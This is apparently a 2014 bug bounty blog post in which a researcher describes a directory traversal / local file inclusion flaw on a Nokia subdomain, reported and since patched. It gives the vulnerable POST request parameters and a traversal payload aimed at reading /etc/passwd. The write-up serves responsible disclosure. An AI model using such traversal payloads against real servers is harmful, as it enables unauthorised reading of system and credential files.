Sunday, 21 September 2014

Nokia Web Security Bug Reward: Directory Traversal / Local File inclusion Vulnerability




Little Insight: 

 

Well this is my first Directory Traversal Vulnerability / Local File inclusion Vulnerability

 

which I spotted in  http://conversations.nokia.com  

 

Report Date :  5th march 2014 

 

Reward For  Directory Traversal Vulnerability  : Nokia  Lumia 925 Phone

 

How This Work


when i was testing it was found url a link on  subdomain 


with post request 

action=get_ajax_post_template&page=2&param=4614&postPerPage=12&template=

when i am use any word template=Jeet thats show 200  responce with result as 0






Template parameter show its access another url form site


 ... now work begin....


My Finding....




with post request 

action=get_ajax_post_template&page=2&param=4614&postPerPage=12&template=

Template parameter show its access another url That's gave me a hint may be there is an LFI

Then i am  Googled for a cheat sheet For Directory Traversal

In a few minutes complete Task and found Traversal parameter....as


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

 

 

 Normal Request..

 

 

 

 

 

 After Payload...

 

 

 

 

More Information

 

The vulnerability mentioned here has been confirmed patched by the Nokia Security Team.